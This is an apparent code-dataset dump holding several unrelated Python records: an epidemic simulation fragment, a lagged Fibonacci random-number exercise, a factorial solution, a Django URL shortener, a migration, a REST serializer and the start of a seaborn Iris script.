Population, Discrete\")\n plt.legend()\n plt.show()\n\n\n#We run a simulation here,use the default value of p and q\nrun_Simulation2(0.6,N=20000,T = 30,start=10)\n\ndef checkinfectb(k,N,T,start=1,p=0.5,q=0.08,startcenter = False,startcorner=False):\n \"\"\"\n we use this function for checking the total infected people\n \"\"\"\n recover = [0]\n infect = [start]\n suspect = [N-start]\n pop = [Person() for i in range(N)]\n np.random.seed(10)\n for i in range(start):\n pop[i].get_infected();\n if(startcenter):\n resetcenter(start,pop)\n if(startcorner):\n resetcorner(start,pop)\n np.random.seed(10)\n for i in range(T):\n for j in range(N):\n pop[j].movepos(p)\n X = calculatedistance(pop)\n tree = cKDTree(X)\n for j in range(N):\n if pop[j].is_infected():\n addvalue = np.array([X[j]])\n inds = tree.query_ball_point(addvalue, q)\n inds = inds[0]\n for l in inds:\n if pop[l].is_willinfected():\n pop[l].get_infected()\n for j in range(N):\n if pop[j].is_infected():\n if np.random.rand()<k:\n pop[j].get_recovered()\n return np.array([(count_infect(pop)+count_recover(pop))/N,count_infect(pop)/N])\n\n\n\ndef plotcenterrange():\n \"\"\"\n show how the total infected people i change with p start from center\n \"\"\"\n plist1 = np.arange(0.02,0.1,0.02)\n plist = np.arange(0.1,1,0.1)\n infectlist = []\n for i in plist1:\n infectlist.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcenter=True)[0])\n for i in plist:\n infectlist.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcenter=True)[0])\n plt.plot(np.hstack((plist1,plist)),infectlist)\n plt.title(\"centerplot\")\n plt.xlabel(\"p\")\n plt.ylabel(\"total number of individuals infected\")\n 
plt.title(\"Total Number of Individuals Infected vs p\")\n plt.show()\n\nplotcenterrange()\n\n\n\n\"\"\"\ndef plotrandomcornerrange():\n\n plist1 = np.arange(0.02,0.1,0.02)\n plist = np.arange(0.1,1,0.1)\n infectlist = []\n infectlist2 = []\n infectlist3 = []\n for i in plist1:\n infectlist.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcorner=True)[0])\n infectlist2.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)))[0])\n infectlist3.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcenter = True)[0])\n for i in plist:\n infectlist.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcorner=True)[0])\n infectlist2.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)))[0])\n infectlist3.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcenter = True)[0])\n plt.plot(np.hstack((plist1,plist)),infectlist,label = \"corner\")\n plt.plot(np.hstack((plist1,plist)),infectlist2,label = \"random\")\n plt.plot(np.hstack((plist1,plist)),infectlist3,label = \"center\")\n plt.title(\"Change from random corner center\")\n plt.xlabel(\"change of p\")\n plt.ylabel(\"change of total infected people\")\n plt.legend()\n plt.show()\n\n\"\"\"\n#plotrandomcornerrange()\n#no need for us to use this function\n\nvaluecorner = checkinfectb(0.5,20000,30,200,p = 0.05,q = np.sqrt(2/(20000*math.pi)),startcorner=True)[0]\nvaluecenter = checkinfectb(0.5,20000,30,200,p = 0.05,q = np.sqrt(2/(20000*math.pi)),startcenter=True)[0]\nvaluerandom = checkinfectb(0.5,20000,30,200,p = 0.05,q = np.sqrt(2/(20000*math.pi)))[0]\nprint(\"p = 0.05, starting randomly, the total infected number is \"+ str(valuerandom))\nprint(\"p = 0.05, starting from corner, the total infected number is \"+ str(valuecorner))\nprint(\"p = 0.05, starting from center, the total infected number is \"+ str(valuecenter))\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from math import gcd
from random import randint, choice
task = """6. Implement an algorithm for building a pseudorandom sequence (PRS) using the
lagged Fibonacci method. Justify the choice of the algorithm's coefficients.
For the initial fill, use a standard linear congruential PRS with a
chosen period. Provide the ability for the user to enter the
coefficients in advance."""
def factor(n):
result = []
d = 2
while d * d <= n:
if n % d == 0:
result.append(d)
n //= d
else:
d += 1
if n > 1:
result.append(n)
return result
def get_coeff(period):
c = randint(0, period)
while gcd(c, period) != 1:
c += 1
b = 2
a = None
factor_result = factor(period)
while b <= period:
if all([b % p == 0 for p in factor_result]):
if period % 4 == 0:
if b % 4 == 0:
a = b + 1
break
else:
a = b + 1
break
b += 1
return a, c, randint(2, period)
def gen_linear_congruential(period):
coeff_a, coeff_c, x0 = get_coeff(period)
result = [x0]
for i in range(1, period):
result.append((coeff_a * result[i - 1] + coeff_c) % period)
return result
def LFG(init, lst, m, count):
result = init.copy()
for i in range(len(init), count):
result.append(sum([result[len(result) - j] for j in lst]) % (2 ** m))
return result
delays = input("Lag parameters: ")
if not delays:
# y = x^k + x^j + 1 must be primitive
delays = choice([[7, 10], [5, 17], [24, 55], [65, 71], [128, 159]])
k = delays[1] + 10
m = 8
print(f"delays = {delays}, k = {k}, m = {m}")
else:
delays = [int(item) for item in delays.split()]
    k = int(input("Initial fill length: "))
    m = int(input("Modulus: "))
initial_filling = gen_linear_congruential(k)
print(LFG(initial_filling, delays, m, 1000))
|
normal
|
{
"blob_id": "11e9d25c30c8c9945cfa3c234ffa1aab98d1869e",
"index": 8023,
"step-1": "<mask token>\n\n\ndef factor(n):\n result = []\n d = 2\n while d * d <= n:\n if n % d == 0:\n result.append(d)\n n //= d\n else:\n d += 1\n if n > 1:\n result.append(n)\n return result\n\n\ndef get_coeff(period):\n c = randint(0, period)\n while gcd(c, period) != 1:\n c += 1\n b = 2\n a = None\n factor_result = factor(period)\n while b <= period:\n if all([(b % p == 0) for p in factor_result]):\n if period % 4 == 0:\n if b % 4 == 0:\n a = b + 1\n break\n else:\n a = b + 1\n break\n b += 1\n return a, c, randint(2, period)\n\n\ndef gen_linear_congruential(period):\n coeff_a, coeff_c, x0 = get_coeff(period)\n result = [x0]\n for i in range(1, period):\n result.append((coeff_a * result[i - 1] + coeff_c) % period)\n return result\n\n\ndef LFG(init, lst, m, count):\n result = init.copy()\n for i in range(len(init), count):\n result.append(sum([result[len(result) - j] for j in lst]) % 2 ** m)\n return result\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef factor(n):\n result = []\n d = 2\n while d * d <= n:\n if n % d == 0:\n result.append(d)\n n //= d\n else:\n d += 1\n if n > 1:\n result.append(n)\n return result\n\n\ndef get_coeff(period):\n c = randint(0, period)\n while gcd(c, period) != 1:\n c += 1\n b = 2\n a = None\n factor_result = factor(period)\n while b <= period:\n if all([(b % p == 0) for p in factor_result]):\n if period % 4 == 0:\n if b % 4 == 0:\n a = b + 1\n break\n else:\n a = b + 1\n break\n b += 1\n return a, c, randint(2, period)\n\n\ndef gen_linear_congruential(period):\n coeff_a, coeff_c, x0 = get_coeff(period)\n result = [x0]\n for i in range(1, period):\n result.append((coeff_a * result[i - 1] + coeff_c) % period)\n return result\n\n\ndef LFG(init, lst, m, count):\n result = init.copy()\n for i in range(len(init), count):\n result.append(sum([result[len(result) - j] for j in lst]) % 2 ** m)\n return result\n\n\n<mask token>\nif not delays:\n delays = choice([[7, 10], [5, 17], [24, 55], [65, 71], [128, 159]])\n k = delays[1] + 10\n m = 8\n print(f'delays = {delays}, k = {k}, m = {m}')\nelse:\n delays = [int(item) for item in delays.split()]\n k = int(input('Длина начального заполнения: '))\n m = int(input('Модуль: '))\n<mask token>\nprint(LFG(initial_filling, delays, m, 1000))\n",
"step-3": "<mask token>\ntask = \"\"\"6. Реализовать алгоритм построения ПСП методом Фиббоначи с\nзапаздываниями. Обосновать выбор коэффициентов алгоритма. Для\nначального заполнения использовать стандартную линейную конгруэнтную\nПСП с выбранным периодом. Реализовать возможность для пользователя\nвводить коэффициенты заранее.\"\"\"\n\n\ndef factor(n):\n result = []\n d = 2\n while d * d <= n:\n if n % d == 0:\n result.append(d)\n n //= d\n else:\n d += 1\n if n > 1:\n result.append(n)\n return result\n\n\ndef get_coeff(period):\n c = randint(0, period)\n while gcd(c, period) != 1:\n c += 1\n b = 2\n a = None\n factor_result = factor(period)\n while b <= period:\n if all([(b % p == 0) for p in factor_result]):\n if period % 4 == 0:\n if b % 4 == 0:\n a = b + 1\n break\n else:\n a = b + 1\n break\n b += 1\n return a, c, randint(2, period)\n\n\ndef gen_linear_congruential(period):\n coeff_a, coeff_c, x0 = get_coeff(period)\n result = [x0]\n for i in range(1, period):\n result.append((coeff_a * result[i - 1] + coeff_c) % period)\n return result\n\n\ndef LFG(init, lst, m, count):\n result = init.copy()\n for i in range(len(init), count):\n result.append(sum([result[len(result) - j] for j in lst]) % 2 ** m)\n return result\n\n\ndelays = input('Параметры запаздывания: ')\nif not delays:\n delays = choice([[7, 10], [5, 17], [24, 55], [65, 71], [128, 159]])\n k = delays[1] + 10\n m = 8\n print(f'delays = {delays}, k = {k}, m = {m}')\nelse:\n delays = [int(item) for item in delays.split()]\n k = int(input('Длина начального заполнения: '))\n m = int(input('Модуль: '))\ninitial_filling = gen_linear_congruential(k)\nprint(LFG(initial_filling, delays, m, 1000))\n",
"step-4": "from math import gcd\nfrom random import randint, choice\ntask = \"\"\"6. Реализовать алгоритм построения ПСП методом Фиббоначи с\nзапаздываниями. Обосновать выбор коэффициентов алгоритма. Для\nначального заполнения использовать стандартную линейную конгруэнтную\nПСП с выбранным периодом. Реализовать возможность для пользователя\nвводить коэффициенты заранее.\"\"\"\n\n\ndef factor(n):\n result = []\n d = 2\n while d * d <= n:\n if n % d == 0:\n result.append(d)\n n //= d\n else:\n d += 1\n if n > 1:\n result.append(n)\n return result\n\n\ndef get_coeff(period):\n c = randint(0, period)\n while gcd(c, period) != 1:\n c += 1\n b = 2\n a = None\n factor_result = factor(period)\n while b <= period:\n if all([(b % p == 0) for p in factor_result]):\n if period % 4 == 0:\n if b % 4 == 0:\n a = b + 1\n break\n else:\n a = b + 1\n break\n b += 1\n return a, c, randint(2, period)\n\n\ndef gen_linear_congruential(period):\n coeff_a, coeff_c, x0 = get_coeff(period)\n result = [x0]\n for i in range(1, period):\n result.append((coeff_a * result[i - 1] + coeff_c) % period)\n return result\n\n\ndef LFG(init, lst, m, count):\n result = init.copy()\n for i in range(len(init), count):\n result.append(sum([result[len(result) - j] for j in lst]) % 2 ** m)\n return result\n\n\ndelays = input('Параметры запаздывания: ')\nif not delays:\n delays = choice([[7, 10], [5, 17], [24, 55], [65, 71], [128, 159]])\n k = delays[1] + 10\n m = 8\n print(f'delays = {delays}, k = {k}, m = {m}')\nelse:\n delays = [int(item) for item in delays.split()]\n k = int(input('Длина начального заполнения: '))\n m = int(input('Модуль: '))\ninitial_filling = gen_linear_congruential(k)\nprint(LFG(initial_filling, delays, m, 1000))\n",
"step-5": "from math import gcd\nfrom random import randint, choice\n\ntask = \"\"\"6. Реализовать алгоритм построения ПСП методом Фиббоначи с\nзапаздываниями. Обосновать выбор коэффициентов алгоритма. Для\nначального заполнения использовать стандартную линейную конгруэнтную\nПСП с выбранным периодом. Реализовать возможность для пользователя\nвводить коэффициенты заранее.\"\"\"\n\n\ndef factor(n):\n result = []\n d = 2\n while d * d <= n:\n if n % d == 0:\n result.append(d)\n n //= d\n else:\n d += 1\n if n > 1:\n result.append(n)\n return result\n\n\ndef get_coeff(period):\n c = randint(0, period)\n while gcd(c, period) != 1:\n c += 1\n b = 2\n a = None\n factor_result = factor(period)\n while b <= period:\n if all([b % p == 0 for p in factor_result]):\n if period % 4 == 0:\n if b % 4 == 0:\n a = b + 1\n break\n else:\n a = b + 1\n break\n b += 1\n return a, c, randint(2, period)\n\n\ndef gen_linear_congruential(period):\n coeff_a, coeff_c, x0 = get_coeff(period)\n result = [x0]\n for i in range(1, period):\n result.append((coeff_a * result[i - 1] + coeff_c) % period)\n return result\n\n\ndef LFG(init, lst, m, count):\n result = init.copy()\n for i in range(len(init), count):\n result.append(sum([result[len(result) - j] for j in lst]) % (2 ** m))\n return result\n\n\ndelays = input(\"Параметры запаздывания: \")\nif not delays:\n # y = x^k + x^j + 1 must be primitive\n delays = choice([[7, 10], [5, 17], [24, 55], [65, 71], [128, 159]])\n k = delays[1] + 10\n m = 8\n print(f\"delays = {delays}, k = {k}, m = {m}\")\nelse:\n delays = [int(item) for item in delays.split()]\n k = int(input(\"Длина начального заполнения: \"))\n m = int(input(\"Модуль: \"))\ninitial_filling = gen_linear_congruential(k)\nprint(LFG(initial_filling, delays, m, 1000))\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def extraLongFactorials(n):
print(math.factorial(n))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def extraLongFactorials(n):
print(math.factorial(n))
if __name__ == '__main__':
n = int(input())
extraLongFactorials(n)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import math
import os
import random
import re
import sys
def extraLongFactorials(n):
print(math.factorial(n))
if __name__ == '__main__':
n = int(input())
extraLongFactorials(n)
<|reserved_special_token_1|>
'''
Function Description
Complete the extraLongFactorials function in the editor below. It should print the result and return.
extraLongFactorials has the following parameter(s):
n: an integer
Note: Factorials of n > 20
can't be stored even in a
long long variable. Big integers must be used for such calculations. Languages like Java, Python, Ruby etc. can handle big integers, but we need to write additional code in C/C++ to handle huge values.
We recommend solving this challenge using BigIntegers.
Input Format
Input consists of a single integer n.
Output Format
Print the factorial of n.
'''
#!/bin/python3
import math
import os
import random
import re
import sys
def extraLongFactorials(n):
print(math.factorial(n))
if __name__ == '__main__':
n = int(input())
extraLongFactorials(n)
|
flexible
|
{
"blob_id": "5c1ce46f45da33acf75a7f47add811b14d58414d",
"index": 1169,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef extraLongFactorials(n):\n print(math.factorial(n))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef extraLongFactorials(n):\n print(math.factorial(n))\n\n\nif __name__ == '__main__':\n n = int(input())\n extraLongFactorials(n)\n",
"step-4": "<mask token>\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\ndef extraLongFactorials(n):\n print(math.factorial(n))\n\n\nif __name__ == '__main__':\n n = int(input())\n extraLongFactorials(n)\n",
"step-5": "'''\r\nFunction Description\r\n\r\nComplete the extraLongFactorials function in the editor below. It should print the result and return.\r\n\r\nextraLongFactorials has the following parameter(s):\r\n\r\n n: an integer\r\n\r\nNote: Factorials of\r\ncan't be stored even in a\r\n\r\nlong long variable. Big integers must be used for such calculations. Languages like Java, Python, Ruby etc. can handle big integers, but we need to write additional code in C/C++ to handle huge values.\r\n\r\nWe recommend solving this challenge using BigIntegers.\r\n\r\nInput Format\r\n\r\nInput consists of a single integer \r\nOutput Format\r\n\r\nPrint the factorial of. \r\n'''\n \r\n#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\ndef extraLongFactorials(n):\r\n print(math.factorial(n))\r\n\r\nif __name__ == '__main__':\r\n n = int(input())\r\n\r\n extraLongFactorials(n)\r\n \n \n ",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from django.shortcuts import render
from django.contrib import messages
from django.views.generic import View
from django.views.decorators.http import require_GET, require_POST
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse,HttpResponsePermanentRedirect,HttpResponseRedirect
from django.db.models import Count
from .forms import UrlForm
from .models import Link
import random
import string
def short_url_gen(stringLength=5):
"""Generate a random string of fixed length """
letters = string.ascii_letters + string.digits
return ''.join(random.choice(letters) for i in range(stringLength))
@require_GET
def Follow(request,shorturl):
link = get_object_or_404(Link,shorturl=shorturl)
link.vi += 1
print(link.vi)
link.save()
return HttpResponseRedirect(link.link)
def FormView(request):
toplink = Link.objects.annotate(Count('vi')).order_by('-vi__count')[:5]
if request.user.is_authenticated:
yl = Link.objects.filter(user = request.user)
else:
yl = None
context = {
'form' :UrlForm,
'links':yl,
't':toplink
}
return render(request, 'shortu.html', context)
@require_GET
def info(request,shorturl):
link = get_object_or_404(Link,shorturl=shorturl)
return render(request,'info.html',{'link':link})
@require_POST
def Submit(request):
form = UrlForm(request.POST)
if form.is_valid():
link = form.cleaned_data['url']
costom = form.cleaned_data['costom']
if costom:
if Link.objects.filter(shorturl=costom).exists():
                #messages(request, "Custom url already taken")
pass
else:
shorturl = costom
newlink = Link.objects.create(link= link,user = request.user, shorturl= shorturl)
return render(request,'info.html',{'link':newlink})
j=1
while j<11:
newshort = short_url_gen(j)
if Link.objects.filter(shorturl=costom).exists():
j+=1
continue
newlink = Link.objects.create(link= link, shorturl= newshort,user = request.user)
return render(request,'info.html',{'link':newlink})
return render(request, 'home.html')
|
normal
|
{
"blob_id": "11952e60ab95bc1896fd899a5ced126dcafec63a",
"index": 9882,
"step-1": "<mask token>\n\n\n@require_GET\ndef Follow(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n link.vi += 1\n print(link.vi)\n link.save()\n return HttpResponseRedirect(link.link)\n\n\ndef FormView(request):\n toplink = Link.objects.annotate(Count('vi')).order_by('-vi__count')[:5]\n if request.user.is_authenticated:\n yl = Link.objects.filter(user=request.user)\n else:\n yl = None\n context = {'form': UrlForm, 'links': yl, 't': toplink}\n return render(request, 'shortu.html', context)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@require_GET\ndef Follow(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n link.vi += 1\n print(link.vi)\n link.save()\n return HttpResponseRedirect(link.link)\n\n\ndef FormView(request):\n toplink = Link.objects.annotate(Count('vi')).order_by('-vi__count')[:5]\n if request.user.is_authenticated:\n yl = Link.objects.filter(user=request.user)\n else:\n yl = None\n context = {'form': UrlForm, 'links': yl, 't': toplink}\n return render(request, 'shortu.html', context)\n\n\n@require_GET\ndef info(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n return render(request, 'info.html', {'link': link})\n\n\n@require_POST\ndef Submit(request):\n form = UrlForm(request.POST)\n if form.is_valid():\n link = form.cleaned_data['url']\n costom = form.cleaned_data['costom']\n if costom:\n if Link.objects.filter(shorturl=costom).exists():\n pass\n else:\n shorturl = costom\n newlink = Link.objects.create(link=link, user=request.user,\n shorturl=shorturl)\n return render(request, 'info.html', {'link': newlink})\n j = 1\n while j < 11:\n newshort = short_url_gen(j)\n if Link.objects.filter(shorturl=costom).exists():\n j += 1\n continue\n newlink = Link.objects.create(link=link, shorturl=newshort,\n user=request.user)\n return render(request, 'info.html', {'link': newlink})\n return render(request, 'home.html')\n",
"step-3": "<mask token>\n\n\ndef short_url_gen(stringLength=5):\n \"\"\"Generate a random string of fixed length \"\"\"\n letters = string.ascii_letters + string.digits\n return ''.join(random.choice(letters) for i in range(stringLength))\n\n\n@require_GET\ndef Follow(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n link.vi += 1\n print(link.vi)\n link.save()\n return HttpResponseRedirect(link.link)\n\n\ndef FormView(request):\n toplink = Link.objects.annotate(Count('vi')).order_by('-vi__count')[:5]\n if request.user.is_authenticated:\n yl = Link.objects.filter(user=request.user)\n else:\n yl = None\n context = {'form': UrlForm, 'links': yl, 't': toplink}\n return render(request, 'shortu.html', context)\n\n\n@require_GET\ndef info(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n return render(request, 'info.html', {'link': link})\n\n\n@require_POST\ndef Submit(request):\n form = UrlForm(request.POST)\n if form.is_valid():\n link = form.cleaned_data['url']\n costom = form.cleaned_data['costom']\n if costom:\n if Link.objects.filter(shorturl=costom).exists():\n pass\n else:\n shorturl = costom\n newlink = Link.objects.create(link=link, user=request.user,\n shorturl=shorturl)\n return render(request, 'info.html', {'link': newlink})\n j = 1\n while j < 11:\n newshort = short_url_gen(j)\n if Link.objects.filter(shorturl=costom).exists():\n j += 1\n continue\n newlink = Link.objects.create(link=link, shorturl=newshort,\n user=request.user)\n return render(request, 'info.html', {'link': newlink})\n return render(request, 'home.html')\n",
"step-4": "from django.shortcuts import render\nfrom django.contrib import messages\nfrom django.views.generic import View\nfrom django.views.decorators.http import require_GET, require_POST\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, HttpResponsePermanentRedirect, HttpResponseRedirect\nfrom django.db.models import Count\nfrom .forms import UrlForm\nfrom .models import Link\nimport random\nimport string\n\n\ndef short_url_gen(stringLength=5):\n \"\"\"Generate a random string of fixed length \"\"\"\n letters = string.ascii_letters + string.digits\n return ''.join(random.choice(letters) for i in range(stringLength))\n\n\n@require_GET\ndef Follow(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n link.vi += 1\n print(link.vi)\n link.save()\n return HttpResponseRedirect(link.link)\n\n\ndef FormView(request):\n toplink = Link.objects.annotate(Count('vi')).order_by('-vi__count')[:5]\n if request.user.is_authenticated:\n yl = Link.objects.filter(user=request.user)\n else:\n yl = None\n context = {'form': UrlForm, 'links': yl, 't': toplink}\n return render(request, 'shortu.html', context)\n\n\n@require_GET\ndef info(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n return render(request, 'info.html', {'link': link})\n\n\n@require_POST\ndef Submit(request):\n form = UrlForm(request.POST)\n if form.is_valid():\n link = form.cleaned_data['url']\n costom = form.cleaned_data['costom']\n if costom:\n if Link.objects.filter(shorturl=costom).exists():\n pass\n else:\n shorturl = costom\n newlink = Link.objects.create(link=link, user=request.user,\n shorturl=shorturl)\n return render(request, 'info.html', {'link': newlink})\n j = 1\n while j < 11:\n newshort = short_url_gen(j)\n if Link.objects.filter(shorturl=costom).exists():\n j += 1\n continue\n newlink = Link.objects.create(link=link, shorturl=newshort,\n user=request.user)\n return render(request, 'info.html', {'link': newlink})\n return render(request, 'home.html')\n",
"step-5": "from django.shortcuts import render\nfrom django.contrib import messages\nfrom django.views.generic import View\nfrom django.views.decorators.http import require_GET, require_POST\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse,HttpResponsePermanentRedirect,HttpResponseRedirect\nfrom django.db.models import Count\n\nfrom .forms import UrlForm\nfrom .models import Link\n\nimport random\nimport string\n\ndef short_url_gen(stringLength=5):\n \"\"\"Generate a random string of fixed length \"\"\"\n letters = string.ascii_letters + string.digits\n return ''.join(random.choice(letters) for i in range(stringLength))\n@require_GET\ndef Follow(request,shorturl):\n link = get_object_or_404(Link,shorturl=shorturl)\n link.vi += 1\n print(link.vi)\n link.save()\n return HttpResponseRedirect(link.link)\n\ndef FormView(request):\n toplink = Link.objects.annotate(Count('vi')).order_by('-vi__count')[:5]\n if request.user.is_authenticated:\n yl = Link.objects.filter(user = request.user)\n else:\n yl = None\n context = {\n 'form' :UrlForm,\n 'links':yl,\n 't':toplink\n }\n\n return render(request, 'shortu.html', context)\n@require_GET\ndef info(request,shorturl):\n link = get_object_or_404(Link,shorturl=shorturl)\n return render(request,'info.html',{'link':link})\n\n@require_POST\ndef Submit(request):\n form = UrlForm(request.POST)\n if form.is_valid():\n link = form.cleaned_data['url']\n costom = form.cleaned_data['costom']\n if costom:\n if Link.objects.filter(shorturl=costom).exists():\n #messages(request,\"Costom url aready taken\")\n pass\n else: \n shorturl = costom\n newlink = Link.objects.create(link= link,user = request.user, shorturl= shorturl)\n return render(request,'info.html',{'link':newlink})\n j=1\n while j<11:\n newshort = short_url_gen(j)\n if Link.objects.filter(shorturl=costom).exists():\n j+=1\n continue\n newlink = Link.objects.create(link= link, shorturl= newshort,user = request.user)\n return render(request,'info.html',{'link':newlink})\n \n\n return render(request, 'home.html')",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
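A minimal side sketch, not part of the record above: the retry loop in Submit filters on `costom` rather than the freshly generated candidate, so a collision check along these lines (assuming the Link model and short_url_gen shown in the record) expresses the likely intent.

def allocate_short_code(max_len=10):
    # Try progressively longer random codes until an unused one is found.
    # Assumes Link and short_url_gen from the record above.
    for length in range(1, max_len + 1):
        candidate = short_url_gen(length)
        if not Link.objects.filter(shorturl=candidate).exists():
            return candidate
    return None  # exhausted; the caller decides how to report this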
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('usuarios', '0001_initial')]
operations = [migrations.AlterField(model_name='usuario', name='inicio',
field=models.DateField(verbose_name='Data Inicio')), migrations.
AlterField(model_name='usuario', name='saida', field=models.
DateField(null=True, verbose_name='Data de Saida'))]
<|reserved_special_token_1|>
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('usuarios', '0001_initial')]
operations = [migrations.AlterField(model_name='usuario', name='inicio',
field=models.DateField(verbose_name='Data Inicio')), migrations.
AlterField(model_name='usuario', name='saida', field=models.
DateField(null=True, verbose_name='Data de Saida'))]
<|reserved_special_token_1|>
# Generated by Django 2.2.2 on 2019-07-30 01:25
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('usuarios', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='usuario',
name='inicio',
field=models.DateField(verbose_name='Data Inicio'),
),
migrations.AlterField(
model_name='usuario',
name='saida',
field=models.DateField(null=True, verbose_name='Data de Saida'),
),
]
|
flexible
|
{
"blob_id": "5e4a334b373d912ba37b18f95e4866450bda5570",
"index": 3938,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('usuarios', '0001_initial')]\n operations = [migrations.AlterField(model_name='usuario', name='inicio',\n field=models.DateField(verbose_name='Data Inicio')), migrations.\n AlterField(model_name='usuario', name='saida', field=models.\n DateField(null=True, verbose_name='Data de Saida'))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('usuarios', '0001_initial')]\n operations = [migrations.AlterField(model_name='usuario', name='inicio',\n field=models.DateField(verbose_name='Data Inicio')), migrations.\n AlterField(model_name='usuario', name='saida', field=models.\n DateField(null=True, verbose_name='Data de Saida'))]\n",
"step-5": "# Generated by Django 2.2.2 on 2019-07-30 01:25\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('usuarios', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='usuario',\n name='inicio',\n field=models.DateField(verbose_name='Data Inicio'),\n ),\n migrations.AlterField(\n model_name='usuario',\n name='saida',\n field=models.DateField(null=True, verbose_name='Data de Saida'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
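For reference, a sketch of the two Usuario fields these AlterField operations describe; the rest of the model from 0001_initial is not part of the record, so only these two fields are reproduced here.

from django.db import models


class Usuario(models.Model):
    # Field definitions mirroring the AlterField operations above;
    # any other fields from the initial migration are omitted.
    inicio = models.DateField(verbose_name='Data Inicio')
    saida = models.DateField(null=True, verbose_name='Data de Saida')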
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TasksSerializer(serializers.ModelSerializer):
<|reserved_special_token_0|>
class Meta:
model = Tasks
fields = ['id', 'created', 'title', 'description', 'status', 'user']
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TasksSerializer(serializers.ModelSerializer):
user = serializers.ReadOnlyField(source='user.username')
class Meta:
model = Tasks
fields = ['id', 'created', 'title', 'description', 'status', 'user']
<|reserved_special_token_1|>
from rest_framework import serializers
from dailytasks.models import Tasks
class TasksSerializer(serializers.ModelSerializer):
user = serializers.ReadOnlyField(source='user.username')
class Meta:
model = Tasks
fields = ['id', 'created', 'title', 'description', 'status', 'user']
|
flexible
|
{
"blob_id": "3fa1736fd87448ec0da4649153521d0aba048ccf",
"index": 3689,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass TasksSerializer(serializers.ModelSerializer):\n <mask token>\n\n\n class Meta:\n model = Tasks\n fields = ['id', 'created', 'title', 'description', 'status', 'user']\n",
"step-3": "<mask token>\n\n\nclass TasksSerializer(serializers.ModelSerializer):\n user = serializers.ReadOnlyField(source='user.username')\n\n\n class Meta:\n model = Tasks\n fields = ['id', 'created', 'title', 'description', 'status', 'user']\n",
"step-4": "from rest_framework import serializers\nfrom dailytasks.models import Tasks\n\n\nclass TasksSerializer(serializers.ModelSerializer):\n user = serializers.ReadOnlyField(source='user.username')\n\n\n class Meta:\n model = Tasks\n fields = ['id', 'created', 'title', 'description', 'status', 'user']\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
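A hedged usage sketch, not part of the record: a generic DRF view would typically pair this serializer with the Tasks queryset and fill the read-only user field from the request (TasksList is a made-up name for illustration).

from rest_framework import generics, permissions
from dailytasks.models import Tasks


class TasksList(generics.ListCreateAPIView):
    # Assumes TasksSerializer is importable from the module shown above.
    queryset = Tasks.objects.all()
    serializer_class = TasksSerializer
    permission_classes = [permissions.IsAuthenticated]

    def perform_create(self, serializer):
        # user is read-only on the serializer, so it is supplied here.
        serializer.save(user=self.request.user)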
# First, we'll import pandas, a data processing and CSV file I/O library
import pandas as pd
# We'll also import seaborn, a Python graphing library
import warnings # current version of seaborn generates a bunch of warnings that we'll ignore
warnings.filterwarnings("ignore")
import seaborn as sns
import matplotlib.pyplot as plt
sns.set(style="white", color_codes=True)
# Next, we'll load the Iris flower dataset; here it's read from "finalOutputV1.csv" in the working directory
